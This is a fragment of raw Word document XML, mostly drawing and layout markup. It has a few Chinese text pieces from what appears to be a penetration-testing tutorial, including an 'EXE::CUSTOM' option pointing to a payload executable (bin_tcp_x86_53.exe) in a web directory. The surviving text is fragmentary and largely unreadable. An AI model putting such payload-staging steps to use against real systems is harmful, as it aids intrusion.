      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:177.600pt;width:467.400pt;height:216.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:527.400pt;width:440.400pt;height:46.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:635.400pt;width:444.600pt;height:57.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30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Automatic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需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设置一非，常用选项：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EXE::CUSTOM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www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html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bin_tc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p_x86_53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exe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EXE::CUSTOM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var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www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html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bin_tcp_x86_53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机当前端口如下：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558.500pt;width:0.500pt;height:156.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,11170" coordsize="10,3130">
        <v:shape style="position:absolute;left:10390;top:11170;width:10;height:3130" coordorigin="10390,11170" coordsize="10,3130" path="m10402,11175l10402,11175,10402,11175,10402,11175,10402,11175,10402,11175,10402,11175,10402,11175,10402,11175,10402,11176,10402,11176,10402,11176,10402,11177,10402,11178,10402,11179,10402,11180,10402,11181,10402,11182,10402,11184,10402,11185,10402,11187,10402,11189,10402,11192,10402,11194,10402,11197,10402,11200,10402,11204,10402,11207,10402,11211,10402,11215,10402,11220,10402,11225,10402,11230,10402,11235,10402,11241,10402,11247,10402,11254,10402,11261,10402,11268,10402,11276,10402,11285,10402,11293,10402,11302,10402,11312,10402,11322,10402,11332,10402,11343,10402,11355,10402,11367,10402,11379,10402,11393,10402,11406,10402,11420,10402,11435,10402,11450,10402,11466,10402,11483,10402,11500,10402,11518,10402,11536,10402,11555,10402,11575,10402,11595,10402,11616,10402,11638,10402,11660,10402,11683,10402,11707,10402,11732,10402,11757,10402,11783,10402,11810,10402,11838,10402,11866,10402,11895,10402,11925,10402,11956,10402,11988,10402,12020,10402,12054,10402,12088,10402,12123,10402,12159,10402,12196,10402,12234,10402,12273,10402,12312,10402,12353,10402,12394,10402,12437,10402,12481,10402,12525,10402,12571,10402,12617,10402,12665,10402,12713,10402,12763,10402,12814,10402,12865,10402,12918,10402,12972,10402,13027,10402,13083,10402,13140,10402,13199,10402,13258,10402,13319,10402,13381,10402,13444,10402,13508,10402,13574,10402,13640,10402,13708,10402,13777,10402,13847,10402,13919,10402,13992,10402,14066,10402,14141,10402,14218,10402,14296e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:557.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11150" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:11150;width:8990;height:670" coordorigin="1490,11150" coordsize="8990,670" path="m1510,11175l1510,11175,1510,11175,1510,11175,1510,11175,1510,11175,1510,11175,1511,11175,1512,11175,1512,11175,1514,11175,1515,11175,1517,11175,1519,11175,1521,11175,1524,11175,1528,11175,1532,11175,1536,11175,1541,11175,1546,11175,1552,11175,1559,11175,1566,11175,1575,11175,1583,11175,1593,11175,1603,11175,1615,11175,1627,11175,1640,11175,1654,11175,1668,11175,1684,11175,1701,11175,1719,11175,1738,11175,1758,11175,1780,11175,1802,11175,1826,11175,1851,11175,1877,11175,1904,11175,1933,11175,1963,11175,1995,11175,2028,11175,2063,11175,2099,11175,2136,11175,2175,11175,2216,11175,2259,11175,2303,11175,2348,11175,2396,11175,2445,11175,2496,11175,2549,11175,2604,11175,2660,11175,2719,11175,2779,11175,2841,11175,2906,11175,2972,11175,3041,11175,3112,11175,3184,11175,3259,11175,3336,11175,3416,11175,3498,11175,3582,11175,3668,11175,3757,11175,3848,11175,3941,11175,4037,11175,4136,11175,4236,11175,4340,11175,4446,11175,4555,11175,4666,11175,4780,11175,4897,11175,5017,11175,5139,11175,5264,11175,5392,11175,5523,11175,5657,11175,5793,11175,5933,11175,6076,11175,6222,11175,6370,11175,6522,11175,6677,11175,6835,11175,6997,11175,7161,11175,7329,11175,7500,11175,7675,11175,7853,11175,8034,11175,8219,11175,8407,11175,8598,11175,8793,11175,8992,11175,9194,11175,9400,11175,9609,11175,9823,11175,10039,11175,10260,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11176,10484,11176,10484,11176,10484,11177,10484,11177,10484,11177,10484,11178,10484,11178,10484,11179,10484,11179,10484,11180,10484,11181,10484,11182,10484,11182,10484,11183,10484,11184,10484,11185,10484,11186,10484,11187,10484,11189,10484,11190,10484,11191,10484,11193,10484,11194,10484,11196,10484,11198,10484,11200,10484,11202,10484,11204,10484,11206,10484,11208,10484,11210,10484,11213,10484,11215,10484,11218,10484,11221,10484,11224,10484,11227,10484,11230,10484,11233,10484,11236,10484,11240,10484,11243,10484,11247,10484,11251,10484,11255,10484,11259,10484,11264,10484,11268,10484,11273,10484,11277,10484,11282,10484,11287,10484,11292,10484,11298,10484,11303,10484,11309,10484,11315,10484,11321,10484,11327,10484,11333,10484,11340,10484,11347,10484,11354,10484,11361,10484,11368,10484,11375,10484,11383,10484,11391,10484,11399,10484,11407,10484,11415,10484,11424,10484,11433,10484,11442,10484,11451,10484,11460,10484,11470,10484,11480,10484,11490,10484,11500,10484,11511,10484,11521,10484,11532,10484,11543,10484,11555,10484,11566,10484,11578,10484,11590,10484,11603,10484,11615,10484,11628,10484,11641,10484,11655,10484,11668,10484,11682,10484,11696,10484,11711,10484,11725,10484,11740,10484,11755,10484,11771,10484,11786,10484,11802,10484,11818,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10483,11835,10482,11835,10482,11835,10480,11835,10479,11835,10477,11835,10475,11835,10473,11835,10470,11835,10466,11835,10462,11835,10458,11835,10453,11835,10448,11835,10442,11835,10435,11835,10428,11835,10419,11835,10411,11835,10401,11835,10391,11835,10379,11835,10367,11835,10354,11835,10340,11835,10326,11835,10310,11835,10293,11835,10275,11835,10256,11835,10236,11835,10215,11835,10192,11835,10168,11835,10143,11835,10117,11835,10090,11835,10061,11835,10031,11835,9999,11835,9966,11835,9931,11835,9895,11835,9858,11835,9819,11835,9778,11835,9735,11835,9691,11835,9646,11835,9598,11835,9549,11835,9498,11835,9445,11835,9391,11835,9334,11835,9275,11835,9215,11835,9153,11835,9088,11835,9022,11835,8953,11835,8883,11835,8810,11835,8735,11835,8658,11835,8578,11835,8497,11835,8413,11835,8326,11835,8238,11835,8146,11835,8053,11835,7957,11835,7859,11835,7758,11835,7654,11835,7548,11835,7439,11835,7328,11835,7214,11835,7097,11835,6977,11835,6855,11835,6730,11835,6602,11835,6471,11835,6337,11835,6201,11835,6061,11835,5918,11835,5773,11835,5624,11835,5472,11835,5317,11835,5159,11835,4997,11835,4833,11835,4665,11835,4494,11835,4319,11835,4141,11835,3960,11835,3776,11835,3587,11835,3396,11835,3201,11835,3002,11835,2800,11835,2594,11835,2385,11835,2172,11835,1955,11835,1734,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11834,1510,11834,1510,11834,1510,11834,1510,11834,1510,11833,1510,11833,1510,11833,1510,11832,1510,11832,1510,11831,1510,11831,1510,11830,1510,11830,1510,11829,1510,11828,1510,11827,1510,11826,1510,11825,1510,11824,1510,11823,1510,11822,1510,11821,1510,11820,1510,11818,1510,11817,1510,11815,1510,11813,1510,11812,1510,11810,1510,11808,1510,11806,1510,11804,1510,11802,1510,11799,1510,11797,1510,11794,1510,11792,1510,11789,1510,11786,1510,11783,1510,11780,1510,11777,1510,11773,1510,11770,1510,11766,1510,11762,1510,11759,1510,11754,1510,11750,1510,11746,1510,11742,1510,11737,1510,11732,1510,11727,1510,11722,1510,11717,1510,11712,1510,11706,1510,11701,1510,11695,1510,11689,1510,11683,1510,11676,1510,11670,1510,11663,1510,11656,1510,11649,1510,11642,1510,11634,1510,11627,1510,11619,1510,11611,1510,11603,1510,11594,1510,11586,1510,11577,1510,11568,1510,11559,1510,11549,1510,11540,1510,11530,1510,11520,1510,11509,1510,11499,1510,11488,1510,11477,1510,11466,1510,11455,1510,11443,1510,11431,1510,11419,1510,11407,1510,11394,1510,11381,1510,11368,1510,11355,1510,11341,1510,11328,1510,11313,1510,11299,1510,11284,1510,11270,1510,11254,1510,11239,1510,11223,1510,11207,1510,11191,1510,11175e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:558.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11170" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:11170;width:8990;height:10" coordorigin="1490,11170" coordsize="8990,10" path="m1510,11182l1510,11182,1510,11182,1510,11182,1510,11182,1510,11182,1510,11182,1511,11182,1512,11182,1512,11182,1514,11182,1515,11182,1517,11182,1519,11182,1521,11182,1524,11182,1528,11182,1532,11182,1536,11182,1541,11182,1546,11182,1552,11182,1559,11182,1566,11182,1575,11182,1583,11182,1593,11182,1603,11182,1615,11182,1627,11182,1640,11182,1654,11182,1668,11182,1684,11182,1701,11182,1719,11182,1738,11182,1758,11182,1780,11182,1802,11182,1826,11182,1851,11182,1877,11182,1904,11182,1933,11182,1963,11182,1995,11182,2028,11182,2063,11182,2099,11182,2136,11182,2175,11182,2216,11182,2259,11182,2303,11182,2348,11182,2396,11182,2445,11182,2496,11182,2549,11182,2604,11182,2660,11182,2719,11182,2779,11182,2841,11182,2906,11182,2972,11182,3041,11182,3112,11182,3184,11182,3259,11182,3336,11182,3416,11182,3498,11182,3582,11182,3668,11182,3757,11182,3848,11182,3941,11182,4037,11182,4136,11182,4236,11182,4340,11182,4446,11182,4555,11182,4666,11182,4780,11182,4897,11182,5017,11182,5139,11182,5264,11182,5392,11182,5523,11182,5657,11182,5793,11182,5933,11182,6076,11182,6222,11182,6370,11182,6522,11182,6677,11182,6835,11182,6997,11182,7161,11182,7329,11182,7500,11182,7675,11182,7853,11182,8034,11182,8219,11182,8407,11182,8598,11182,8793,11182,8992,11182,9194,11182,9400,11182,9609,11182,9823,11182,10039,11182,10260,11182,10484,11182e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:557.400pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:590.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11810" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:11810;width:8990;height:650" coordorigin="1490,11810" coordsize="8990,650" path="m1510,11835l1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1511,11835,1512,11835,1512,11835,1514,11835,1515,11835,1517,11835,1519,11835,1521,11835,1524,11835,1528,11835,1532,11835,1536,11835,1541,11835,1546,11835,1552,11835,1559,11835,1566,11835,1575,11835,1583,11835,1593,11835,1603,11835,1615,11835,1627,11835,1640,11835,1654,11835,1668,11835,1684,11835,1701,11835,1719,11835,1738,11835,1758,11835,1780,11835,1802,11835,1826,11835,1851,11835,1877,11835,1904,11835,1933,11835,1963,11835,1995,11835,2028,11835,2063,11835,2099,11835,2136,11835,2175,11835,2216,11835,2259,11835,2303,11835,2348,11835,2396,11835,2445,11835,2496,11835,2549,11835,2604,11835,2660,11835,2719,11835,2779,11835,2841,11835,2906,11835,2972,11835,3041,11835,3112,11835,3184,11835,3259,11835,3336,11835,3416,11835,3498,11835,3582,11835,3668,11835,3757,11835,3848,11835,3941,11835,4037,11835,4136,11835,4236,11835,4340,11835,4446,11835,4555,11835,4666,11835,4780,11835,4897,11835,5017,11835,5139,11835,5264,11835,5392,11835,5523,11835,5657,11835,5793,11835,5933,11835,6076,11835,6222,11835,6370,11835,6522,11835,6677,11835,6835,11835,6997,11835,7161,11835,7329,11835,7500,11835,7675,11835,7853,11835,8034,11835,8219,11835,8407,11835,8598,11835,8793,11835,8992,11835,9194,11835,9400,11835,9609,11835,9823,11835,10039,11835,10260,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11836,10484,11836,10484,11836,10484,11836,10484,11836,10484,11837,10484,11837,10484,11838,10484,11838,10484,11838,10484,11839,10484,11840,10484,11840,10484,11841,10484,11842,10484,11842,10484,11843,10484,11844,10484,11845,10484,11846,10484,11847,10484,11848,10484,11850,10484,11851,10484,11852,10484,11854,10484,11855,10484,11857,10484,11859,10484,11861,10484,11863,10484,11865,10484,11867,10484,11869,10484,11871,10484,11874,10484,11876,10484,11879,10484,11882,10484,11885,10484,11888,10484,11891,10484,11894,10484,11897,10484,11901,10484,11904,10484,11908,10484,11912,10484,11916,10484,11920,10484,11924,10484,11928,10484,11933,10484,11938,10484,11942,10484,11947,10484,11953,10484,11958,10484,11963,10484,11969,10484,11975,10484,11980,10484,11987,10484,11993,10484,11999,10484,12006,10484,12012,10484,12019,10484,12026,10484,12034,10484,12041,10484,12049,10484,12057,10484,12065,10484,12073,10484,12081,10484,12090,10484,12099,10484,12108,10484,12117,10484,12126,10484,12136,10484,12146,10484,12156,10484,12166,10484,12176,10484,12187,10484,12198,10484,12209,10484,12220,10484,12232,10484,12244,10484,12256,10484,12268,10484,12280,10484,12293,10484,12306,10484,12319,10484,12333,10484,12347,10484,12360,10484,12375,10484,12389,10484,12404,10484,12419,10484,12434,10484,12450,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10483,12465,10482,12465,10482,12465,10480,12465,10479,12465,10477,12465,10475,12465,10473,12465,10470,12465,10466,12465,10462,12465,10458,12465,10453,12465,10448,12465,10442,12465,10435,12465,10428,12465,10419,12465,10411,12465,10401,12465,10391,12465,10379,12465,10367,12465,10354,12465,10340,12465,10326,12465,10310,12465,10293,12465,10275,12465,10256,12465,10236,12465,10215,12465,10192,12465,10168,12465,10143,12465,10117,12465,10090,12465,10061,12465,10031,12465,9999,12465,9966,12465,9931,12465,9895,12465,9858,12465,9819,12465,9778,12465,9735,12465,9691,12465,9646,12465,9598,12465,9549,12465,9498,12465,9445,12465,9391,12465,9334,12465,9275,12465,9215,12465,9153,12465,9088,12465,9022,12465,8953,12465,8883,12465,8810,12465,8735,12465,8658,12465,8578,12465,8497,12465,8413,12465,8326,12465,8238,12465,8146,12465,8053,12465,7957,12465,7859,12465,7758,12465,7654,12465,7548,12465,7439,12465,7328,12465,7214,12465,7097,12465,6977,12465,6855,12465,6730,12465,6602,12465,6471,12465,6337,12465,6201,12465,6061,12465,5918,12465,5773,12465,5624,12465,5472,12465,5317,12465,5159,12465,4997,12465,4833,12465,4665,12465,4494,12465,4319,12465,4141,12465,3960,12465,3776,12465,3587,12465,3396,12465,3201,12465,3002,12465,2800,12465,2594,12465,2385,12465,2172,12465,1955,12465,1734,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12464,1510,12464,1510,12464,1510,12464,1510,12463,1510,12463,1510,12463,1510,12462,1510,12462,1510,12461,1510,12461,1510,12460,1510,12459,1510,12459,1510,12458,1510,12457,1510,12456,1510,12455,1510,12454,1510,12453,1510,12452,1510,12451,1510,12449,1510,12448,1510,12446,1510,12445,1510,12443,1510,12441,1510,12440,1510,12438,1510,12436,1510,12433,1510,12431,1510,12429,1510,12426,1510,12424,1510,12421,1510,12419,1510,12416,1510,12413,1510,12410,1510,12406,1510,12403,1510,12400,1510,12396,1510,12392,1510,12388,1510,12384,1510,12380,1510,12376,1510,12372,1510,12367,1510,12363,1510,12358,1510,12353,1510,12348,1510,12342,1510,12337,1510,12331,1510,12326,1510,12320,1510,12314,1510,12307,1510,12301,1510,12295,1510,12288,1510,12281,1510,12274,1510,12266,1510,12259,1510,12251,1510,12244,1510,12236,1510,12227,1510,12219,1510,12210,1510,12202,1510,12193,1510,12183,1510,12174,1510,12164,1510,12155,1510,12145,1510,12134,1510,12124,1510,12113,1510,12102,1510,12091,1510,12080,1510,12068,1510,12057,1510,12045,1510,12032,1510,12020,1510,12007,1510,11994,1510,11981,1510,11967,1510,11954,1510,11940,1510,11926,1510,11911,1510,11896,1510,11881,1510,11866,1510,11851,1510,11835e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:591.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11830" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:11830;width:30;height:630" coordorigin="1490,11830" coordsize="30,630" path="m1517,11835l1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11836,1517,11836,1517,11836,1517,11836,1517,11836,1517,11837,1517,11837,1517,11838,1517,11838,1517,11838,1517,11839,1517,11840,1517,11840,1517,11841,1517,11842,1517,11842,1517,11843,1517,11844,1517,11845,1517,11846,1517,11847,1517,11848,1517,11850,1517,11851,1517,11852,1517,11854,1517,11855,1517,11857,1517,11859,1517,11861,1517,11863,1517,11865,1517,11867,1517,11869,1517,11871,1517,11874,1517,11876,1517,11879,1517,11882,1517,11885,1517,11888,1517,11891,1517,11894,1517,11897,1517,11901,1517,11904,1517,11908,1517,11912,1517,11916,1517,11920,1517,11924,1517,11928,1517,11933,1517,11938,1517,11942,1517,11947,1517,11953,1517,11958,1517,11963,1517,11969,1517,11975,1517,11980,1517,11987,1517,11993,1517,11999,1517,12006,1517,12012,1517,12019,1517,12026,1517,12034,1517,12041,1517,12049,1517,12057,1517,12065,1517,12073,1517,12081,1517,12090,1517,12099,1517,12108,1517,12117,1517,12126,1517,12136,1517,12146,1517,12156,1517,12166,1517,12176,1517,12187,1517,12198,1517,12209,1517,12220,1517,12232,1517,12244,1517,12256,1517,12268,1517,12280,1517,12293,1517,12306,1517,12319,1517,12333,1517,12347,1517,12360,1517,12375,1517,12389,1517,12404,1517,12419,1517,12434,1517,12450,1517,12465e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:622.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12450" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:12450;width:8990;height:390" coordorigin="1490,12450" coordsize="8990,390" path="m1510,12465l1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1511,12465,1512,12465,1512,12465,1514,12465,1515,12465,1517,12465,1519,12465,1521,12465,1524,12465,1528,12465,1532,12465,1536,12465,1541,12465,1546,12465,1552,12465,1559,12465,1566,12465,1575,12465,1583,12465,1593,12465,1603,12465,1615,12465,1627,12465,1640,12465,1654,12465,1668,12465,1684,12465,1701,12465,1719,12465,1738,12465,1758,12465,1780,12465,1802,12465,1826,12465,1851,12465,1877,12465,1904,12465,1933,12465,1963,12465,1995,12465,2028,12465,2063,12465,2099,12465,2136,12465,2175,12465,2216,12465,2259,12465,2303,12465,2348,12465,2396,12465,2445,12465,2496,12465,2549,12465,2604,12465,2660,12465,2719,12465,2779,12465,2841,12465,2906,12465,2972,12465,3041,12465,3112,12465,3184,12465,3259,12465,3336,12465,3416,12465,3498,12465,3582,12465,3668,12465,3757,12465,3848,12465,3941,12465,4037,12465,4136,12465,4236,12465,4340,12465,4446,12465,4555,12465,4666,12465,4780,12465,4897,12465,5017,12465,5139,12465,5264,12465,5392,12465,5523,12465,5657,12465,5793,12465,5933,12465,6076,12465,6222,12465,6370,12465,6522,12465,6677,12465,6835,12465,6997,12465,7161,12465,7329,12465,7500,12465,7675,12465,7853,12465,8034,12465,8219,12465,8407,12465,8598,12465,8793,12465,8992,12465,9194,12465,9400,12465,9609,12465,9823,12465,10039,12465,10260,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12466,10484,12466,10484,12466,10484,12466,10484,12466,10484,12466,10484,12466,10484,12466,10484,12467,10484,12467,10484,12467,10484,12467,10484,12468,10484,12468,10484,12468,10484,12469,10484,12469,10484,12470,10484,12470,10484,12471,10484,12471,10484,12472,10484,12473,10484,12473,10484,12474,10484,12475,10484,12476,10484,12477,10484,12477,10484,12478,10484,12480,10484,12481,10484,12482,10484,12483,10484,12484,10484,12486,10484,12487,10484,12488,10484,12490,10484,12491,10484,12493,10484,12495,10484,12497,10484,12498,10484,12500,10484,12502,10484,12504,10484,12507,10484,12509,10484,12511,10484,12513,10484,12516,10484,12518,10484,12521,10484,12524,10484,12526,10484,12529,10484,12532,10484,12535,10484,12538,10484,12542,10484,12545,10484,12548,10484,12552,10484,12555,10484,12559,10484,12563,10484,12567,10484,12571,10484,12575,10484,12579,10484,12584,10484,12588,10484,12593,10484,12597,10484,12602,10484,12607,10484,12612,10484,12617,10484,12622,10484,12628,10484,12633,10484,12639,10484,12644,10484,12650,10484,12656,10484,12662,10484,12668,10484,12675,10484,12681,10484,12688,10484,12695,10484,12702,10484,12709,10484,12716,10484,12723,10484,12730,10484,12738,10484,12746,10484,12754,10484,12762,10484,12770,10484,12778,10484,12787,10484,12795,10484,12804,10484,12813,10484,12822,10484,12831,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10483,12840,10482,12840,10482,12840,10480,12840,10479,12840,10477,12840,10475,12840,10473,12840,10470,12840,10466,12840,10462,12840,10458,12840,10453,12840,10448,12840,10442,12840,10435,12840,10428,12840,10419,12840,10411,12840,10401,12840,10391,12840,10379,12840,10367,12840,10354,12840,10340,12840,10326,12840,10310,12840,10293,12840,10275,12840,10256,12840,10236,12840,10215,12840,10192,12840,10168,12840,10143,12840,10117,12840,10090,12840,10061,12840,10031,12840,9999,12840,9966,12840,9931,12840,9895,12840,9858,12840,9819,12840,9778,12840,9735,12840,9691,12840,9646,12840,9598,12840,9549,12840,9498,12840,9445,12840,9391,12840,9334,12840,9275,12840,9215,12840,9153,12840,9088,12840,9022,12840,8953,12840,8883,12840,8810,12840,8735,12840,8658,12840,8578,12840,8497,12840,8413,12840,8326,12840,8238,12840,8146,12840,8053,12840,7957,12840,7859,12840,7758,12840,7654,12840,7548,12840,7439,12840,7328,12840,7214,12840,7097,12840,6977,12840,6855,12840,6730,12840,6602,12840,6471,12840,6337,12840,6201,12840,6061,12840,5918,12840,5773,12840,5624,12840,5472,12840,5317,12840,5159,12840,4997,12840,4833,12840,4665,12840,4494,12840,4319,12840,4141,12840,3960,12840,3776,12840,3587,12840,3396,12840,3201,12840,3002,12840,2800,12840,2594,12840,2385,12840,2172,12840,1955,12840,1734,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12839,1510,12839,1510,12839,1510,12839,1510,12838,1510,12838,1510,12838,1510,12837,1510,12837,1510,12837,1510,12836,1510,12836,1510,12835,1510,12834,1510,12834,1510,12833,1510,12832,1510,12832,1510,12831,1510,12830,1510,12829,1510,12828,1510,12827,1510,12826,1510,12825,1510,12824,1510,12823,1510,12822,1510,12820,1510,12819,1510,12817,1510,12816,1510,12814,1510,12813,1510,12811,1510,12809,1510,12807,1510,12805,1510,12803,1510,12801,1510,12799,1510,12797,1510,12795,1510,12792,1510,12790,1510,12787,1510,12785,1510,12782,1510,12779,1510,12776,1510,12774,1510,12770,1510,12767,1510,12764,1510,12761,1510,12757,1510,12754,1510,12750,1510,12747,1510,12743,1510,12739,1510,12735,1510,12731,1510,12726,1510,12722,1510,12718,1510,12713,1510,12709,1510,12704,1510,12699,1510,12694,1510,12689,1510,12684,1510,12678,1510,12673,1510,12667,1510,12661,1510,12656,1510,12650,1510,12643,1510,12637,1510,12631,1510,12624,1510,12618,1510,12611,1510,12604,1510,12597,1510,12590,1510,12583,1510,12575,1510,12568,1510,12560,1510,12552,1510,12544,1510,12536,1510,12528,1510,12519,1510,12511,1510,12502,1510,12493,1510,12484,1510,12475,1510,12465e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:622.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12450" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:12450;width:30;height:390" coordorigin="1490,12450" coordsize="30,390" path="m1517,12465l1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12466,1517,12466,1517,12466,1517,12466,1517,12466,1517,12466,1517,12466,1517,12466,1517,12467,1517,12467,1517,12467,1517,12467,1517,12468,1517,12468,1517,12468,1517,12469,1517,12469,1517,12470,1517,12470,1517,12471,1517,12471,1517,12472,1517,12473,1517,12473,1517,12474,1517,12475,1517,12476,1517,12477,1517,12477,1517,12478,1517,12480,1517,12481,1517,12482,1517,12483,1517,12484,1517,12486,1517,12487,1517,12488,1517,12490,1517,12491,1517,12493,1517,12495,1517,12497,1517,12498,1517,12500,1517,12502,1517,12504,1517,12507,1517,12509,1517,12511,1517,12513,1517,12516,1517,12518,1517,12521,1517,12524,1517,12526,1517,12529,1517,12532,1517,12535,1517,12538,1517,12542,1517,12545,1517,12548,1517,12552,1517,12555,1517,12559,1517,12563,1517,12567,1517,12571,1517,12575,1517,12579,1517,12584,1517,12588,1517,12593,1517,12597,1517,12602,1517,12607,1517,12612,1517,12617,1517,12622,1517,12628,1517,12633,1517,12639,1517,12644,1517,12650,1517,12656,1517,12662,1517,12668,1517,12675,1517,12681,1517,12688,1517,12695,1517,12702,1517,12709,1517,12716,1517,12723,1517,12730,1517,12738,1517,12746,1517,12754,1517,12762,1517,12770,1517,12778,1517,12787,1517,12795,1517,12804,1517,12813,1517,12822,1517,12831,1517,12840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:641.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12830" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:12830;width:8990;height:370" coordorigin="1490,12830" coordsize="8990,370" path="m1510,12840l1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1511,12840,1512,12840,1512,12840,1514,12840,1515,12840,1517,12840,1519,12840,1521,12840,1524,12840,1528,12840,1532,12840,1536,12840,1541,12840,1546,12840,1552,12840,1559,12840,1566,12840,1575,12840,1583,12840,1593,12840,1603,12840,1615,12840,1627,12840,1640,12840,1654,12840,1668,12840,1684,12840,1701,12840,1719,12840,1738,12840,1758,12840,1780,12840,1802,12840,1826,12840,1851,12840,1877,12840,1904,12840,1933,12840,1963,12840,1995,12840,2028,12840,2063,12840,2099,12840,2136,12840,2175,12840,2216,12840,2259,12840,2303,12840,2348,12840,2396,12840,2445,12840,2496,12840,2549,12840,2604,12840,2660,12840,2719,12840,2779,12840,2841,12840,2906,12840,2972,12840,3041,12840,3112,12840,3184,12840,3259,12840,3336,12840,3416,12840,3498,12840,3582,12840,3668,12840,3757,12840,3848,12840,3941,12840,4037,12840,4136,12840,4236,12840,4340,12840,4446,12840,4555,12840,4666,12840,4780,12840,4897,12840,5017,12840,5139,12840,5264,12840,5392,12840,5523,12840,5657,12840,5793,12840,5933,12840,6076,12840,6222,12840,6370,12840,6522,12840,6677,12840,6835,12840,6997,12840,7161,12840,7329,12840,7500,12840,7675,12840,7853,12840,8034,12840,8219,12840,8407,12840,8598,12840,8793,12840,8992,12840,9194,12840,9400,12840,9609,12840,9823,12840,10039,12840,10260,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12842,10484,12842,10484,12842,10484,12842,10484,12842,10